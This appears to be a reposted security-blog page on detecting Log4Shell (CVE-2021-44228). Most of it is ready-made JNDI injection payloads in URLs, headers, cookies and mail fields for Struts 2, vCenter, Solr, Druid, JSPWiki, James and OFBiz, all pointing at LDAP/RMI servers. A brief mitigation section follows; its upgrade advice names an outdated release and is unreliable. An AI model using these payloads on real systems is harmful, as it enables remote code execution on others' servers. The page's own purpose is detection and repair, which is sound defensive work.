Error message here!

Hide Error message here!

忘记密码?

Error message here!

请输入正确邮箱

Hide Error message here!

密码丢失?请输入您的电子邮件地址。您将收到一个重设密码链接。

Error message here!

返回登录

Close

The detection involves cve-2021-44228 affecting products

Khan security team 2022-01-24 00:30:15 阅读数:5 评论数:0 点赞数:0 收藏数:0

Apache Struts 2

http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0 .0.1:1099/ylbtsl}'
http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/

VMWare VCenter

"X-Forwarded-For: \${jndi:ldap://10.0.0.3:1270/lol}" "https://10.0.0.4/websso/SAML2/SSO/photon- machine.lan?SAMLRequest="

Apache James

"smtp://localhost" --user "test:test" --mail-from '${jndi:ldap://localhost:1270/a}@gmail.com' --mail-rcpt 'test' --upload-file email.txt

Apache Solr

'http://localhost:8983/solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://10.0.0.6:1270/abc%7D&wt=json'
solr/admin/info/system?_=${jndi:ldap://192.168.1.1/exp}&wt=json

Apache Druid

'http://localhost:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2flocalhost:1270%2fabc%7d'

Apache JSPWiki

http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/

Apache OFBiz

"Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}" https://localhost:8443/webtools/control/main

Repair plan :

1、 Emergency mitigation measures :
(1) modify jvm Parameters -Dlog4j2.formatMsgNoLookups=true
(2) Modify the configuration log4j2.formatMsgNoLookups=True
(3) Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS Set to true
2. Upgrade to the latest version :
Please contact the manufacturer for the official version after repair :
https://github.com/apache/logging-log4j2
The latest version 2.15.0-rc2
3. No use log4j Server external connection , upgrade idk 11.0.1 8u191 7u201 6u211 Or later .
Copyright statement
In this paper,the author:[Khan security team],Reprint please bring the original link, thank you